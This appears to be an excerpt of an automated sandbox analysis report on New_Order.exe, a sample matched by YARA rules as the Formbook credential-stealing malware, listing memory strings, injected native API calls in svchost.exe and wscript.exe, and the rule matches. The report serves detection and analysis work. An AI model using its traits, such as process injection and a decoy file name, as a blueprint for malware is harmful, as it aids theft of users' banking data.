          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: wscript.exe, 00000007.00000002.498023186.0000000004EF2000.00000004.00000001.sdmpString found in binary or memory: https://www.lcn.com/parked-domains/index?/=/domain/websitemax.co.uk
          Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: New_Order.exe
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004181C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418270 NtReadFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004182F0 NtClose,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004181BA NtCreateFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004182EA NtClose,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041839B NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039698F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039697A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039695D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039699D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039698A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039696D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039695F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969560 NtWriteFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048AB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048AAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048AA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048AA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048AA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_006281C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_00628270 NtReadFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_006282F0 NtClose,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_006283A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_006281BA NtCreateFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_006282EA NtClose,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0062839B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_00406945
          Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_0040711C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041BA5D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041C34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00408C60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041B4A3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EBB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E03DA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EDBD2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F2B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394AB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F22AE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DFA2B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392F900
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03944120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393B090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F20A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F28EC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1002
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FE824
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FDFCE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F1FF1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F2EF7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039ED616
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03946E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F25DD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393D5E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F2D07
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03920D20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F1D55
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393841F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039ED466
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487B090
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048920A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_049320A8
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921002
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487841F
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04892581
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487D5E0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0486F900
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04932D07
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04860D20
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04884120
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04931D55
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_049322AE
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04932EF7
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04886E30
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489EBB0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04931FF1
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04932B28
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0062BA5D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0062C34C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_00618C60
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0062B4A3
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_00612D90
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_00612FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0392B150 appears 48 times
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 0486B150 appears 35 times
          Source: New_Order.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: New_Order.exe, 00000000.00000003.233299812.0000000002C3F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs New_Order.exe
          Source: New_Order.exe, 00000000.00000002.240312486.0000000002480000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs New_Order.exe
          Source: New_Order.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
